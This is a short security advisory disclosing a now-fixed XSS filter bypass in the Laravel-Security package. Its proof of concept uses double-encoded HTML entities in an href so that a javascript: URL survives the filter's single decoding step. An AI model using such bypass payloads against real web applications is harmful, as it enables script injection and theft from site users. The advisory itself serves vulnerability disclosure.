*#Product: Lavarel-Security XSS Filter Bypass* *#Vulnerability: Mutation Based XSS Bypass * *#Impact: Medium/High* *#Authors: Rafay Baloch * *#Company: RHAinfoSEC * *#Website: http://rhainfosec.com *#Status: Fixed* *=========* *Description* *=========* Laravel Security is a port of the security class from Codeigniter 2.1 for Laravel 4.1. It relies upon a blacklist approach to filter out common malicious inputs. *=========* *Vulnerability* *==========* The vulnerability lies in the fact that the XSS filter was decoding HTML entities, therefore based upon this fact it was possible to construct a payload that would successfully bypass the filtering mechanisms and execute javascript. *=============* *Proof of concept* *=============* During intial test the following input was provided: <a href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</a> The filter decodes the HTML entities and hence the attack was being blocked. After Decoding: <a href="javascript:alert(1)">Clickhere</a> Next, we double encoded the entities: <a href="&#38&#35&#49&#48&#54&#38&#35&#57&#55&#38&#35&#49&#49&#56&#38&#35&#57&#55&#38&#35&#49&#49&#53&#38&#35&#57&#57&#38&#35&#49&#49&#52&#38&#35&#49&#48&#53&#38&#35&#49&#49&#50&#38&#35&#49&#49&#54&#38&#35&#53&#56&#38&#35&#57&#57&#38&#35&#49&#49&#49&#38&#35&#49&#49&#48&#38&#35&#49&#48&#50&#38&#35&#49&#48&#53&#38&#35&#49&#49&#52&#38&#35&#49&#48&#57&#38&#35&#52&#48&#38&#35&#52&#57&#38&#35&#52&#49">Clickhere</a> And since the filter would decode the entities once, we are left with the following: <a href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</a> Which is perfectly a valid syntax inside of href context and would execute javascript. *===* *Fix* *===* The vulnerability has been fixed, the latest version doesn't decode HTML entites and hence the attack is mitigated. *==========* *References* *==========* https://github.com/GrahamCampbell/Laravel-Security/issues/10#issuecomment-37816413